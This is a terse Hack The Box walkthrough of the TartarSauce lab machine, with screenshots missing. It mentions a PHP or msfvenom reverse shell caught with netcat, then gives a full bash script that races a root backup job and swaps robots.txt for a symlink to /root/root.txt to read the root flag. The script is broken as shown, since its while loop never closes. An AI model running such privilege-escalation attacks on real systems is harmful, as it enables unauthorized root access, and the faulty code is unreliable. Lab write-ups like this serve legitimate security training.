TartarSauce — HTB Walkthrough


Nmap Scan

We were in a big rabbit HOLE

Let’s get back to process one.


You can use php-reverse-shell.php , here I have used the php file we created above {using msfvenom when we were in rabbit hole}

=On server
getting SUDO rights of www-data
we get shell on netcat


Enumerating process using PSPY32
what script does is it takes all files in basedir “ /var/www/html” and tars it to something like .filename.sh in tmpfile = /var/tmp/. Then it makes a temporary directory named check , extracts tmpfile to it, and checks the integrity of file. If successful then backs up to /var/backups/onuma-www-dev.bak, else some error file.

# work out of shm
cd /dev/shm

# set both start and cur equal to any backup file if it's there
start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")

# loop until there's a change in cur
echo "Waiting for archive filename to change..."
while [ "$start" == "$cur" -o "$cur" == "" ] ; do
sleep 10;
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");

# Grab a copy of the archive
echo "File changed... copying here"
cp $cur .

# get filename
fn=$(echo $cur | cut -d'/' -f4)

# extract archive
tar -zxf $fn

# remove robots.txt and replace it with link to root.txt
rm var/www/html/robots.txt
ln -s /root/root.txt var/www/html/robots.txt

# remove old archive
rm $fn

# create new archive
tar czf $fn var

# put it back, and clean up
mv $fn $cur
rm $fn
rm -rf var

# wait for results
echo "Waiting for new logs..."
tail -f /var/backups/onuma_backup_error.txt
wait for five minutes and we get root flag



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store